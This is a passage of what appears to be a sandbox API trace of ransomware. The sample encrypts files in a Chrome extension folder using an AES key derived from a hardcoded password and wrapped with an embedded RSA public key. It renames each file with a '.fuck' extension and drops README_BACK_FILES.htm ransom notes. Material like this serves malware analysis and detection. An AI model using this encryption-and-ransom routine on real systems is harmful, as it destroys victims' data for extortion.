Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.731] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.732] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.733] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.736] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.736] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.736] CryptHashData (hHash=0x29385b8, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.736] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29385b8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29387b8) returned 1 [0253.736] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.736] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.736] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987b98) returned 1 [0253.736] CryptImportPublicKeyInfo (in: hCryptProv=0x2987b98, dwCertEncodingType=0x1, pInfo=0x298f5e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f618*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ba0) returned 1 [0253.737] CryptEncrypt (in: hKey=0x2985ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.737] CryptEncrypt (in: hKey=0x2985ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987428*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987428*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.737] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987428*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987428*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.738] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd4, lpOverlapped=0x0) returned 1 [0253.739] CryptEncrypt (in: hKey=0x29387b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.739] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.739] CloseHandle (hObject=0x5d60) returned 1 [0253.740] CloseHandle (hObject=0x5d5c) returned 1 [0253.740] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), bFailIfExists=0) returned 1 [0253.743] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x0) returned 1 [0253.744] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.gsg")) returned 1 [0253.746] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json.fuck")) returned 1 [0253.747] CryptDestroyHash (hHash=0x29385b8) returned 1 [0253.747] CryptDestroyKey (hKey=0x29387b8) returned 1 [0253.747] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.747] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.747] FindClose (in: hFindFile=0x29384f8 | out: hFindFile=0x29384f8) returned 1 [0253.747] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\readme_back_files.htm")) returned 0xffffffff [0253.747] AreFileApisANSI () returned 1 [0253.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.747] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.748] GetFileType (hFile=0x5d50) returned 0x1 [0253.748] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.750] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.750] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29846a0 [0253.750] FindNextFileA (in: hFindFile=0x29846a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.750] FindNextFileA (in: hFindFile=0x29846a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.750] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.750] GetLastError () returned 0x0 [0253.750] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json")) returned 0x20 [0253.750] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x80) returned 1 [0253.751] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.752] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.752] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.753] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.755] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.755] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.755] CryptHashData (hHash=0x2984be0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.755] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x2984be0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29384f8) returned 1 [0253.755] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.755] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.756] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988170) returned 1 [0253.756] CryptImportPublicKeyInfo (in: hCryptProv=0x2988170, dwCertEncodingType=0x1, pInfo=0x298f850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f888*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29385b8) returned 1 [0253.756] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.756] CryptEncrypt (in: hKey=0x29385b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29873a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29873a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.756] WriteFile (in: hFile=0x5d60, lpBuffer=0x29873a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29873a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.757] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd4, lpOverlapped=0x0) returned 1 [0253.758] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd4, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.759] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.759] CloseHandle (hObject=0x5d5c) returned 1 [0253.759] CloseHandle (hObject=0x5d60) returned 1 [0253.759] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), bFailIfExists=0) returned 1 [0253.763] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json", dwFileAttributes=0x0) returned 1 [0253.763] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.gsg")) returned 1 [0253.764] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\messages.json.fuck")) returned 1 [0253.766] CryptDestroyHash (hHash=0x2984be0) returned 1 [0253.766] CryptDestroyKey (hKey=0x29384f8) returned 1 [0253.766] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.766] FindNextFileA (in: hFindFile=0x29846a0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.766] FindClose (in: hFindFile=0x29846a0 | out: hFindFile=0x29846a0) returned 1 [0253.766] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\readme_back_files.htm")) returned 0xffffffff [0253.766] AreFileApisANSI () returned 1 [0253.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0253.766] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_TW\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_tw\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.767] GetFileType (hFile=0x5d50) returned 0x1 [0253.767] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.768] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0253.768] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0253.768] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\readme_back_files.htm")) returned 0xffffffff [0253.769] AreFileApisANSI () returned 1 [0253.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 150 [0253.769] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0253.770] GetFileType (hFile=0x5d64) returned 0x1 [0253.770] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0253.771] FindNextFileA (in: hFindFile=0x2985ea0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0253.772] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x29387b8 [0253.772] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.772] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.772] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cff4 | out: lpSystemTimeAsFileTime=0x2b9cff4) [0253.772] GetLastError () returned 0x0 [0253.772] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json")) returned 0x20 [0253.772] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json", dwFileAttributes=0x80) returned 1 [0253.773] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.774] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.789] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.gsg", dwFileAttributes=0x2) returned 1 [0253.790] CryptAcquireContextA (in: phProv=0x2b9bff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bff0*=0x298a040) returned 1 [0253.792] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bff4 | out: phHash=0x2b9bff4) returned 1 [0253.792] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0253.792] CryptHashData (hHash=0x2938978, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.792] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bfe0 | out: phKey=0x2b9bfe0*=0x2985a20) returned 1 [0253.793] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 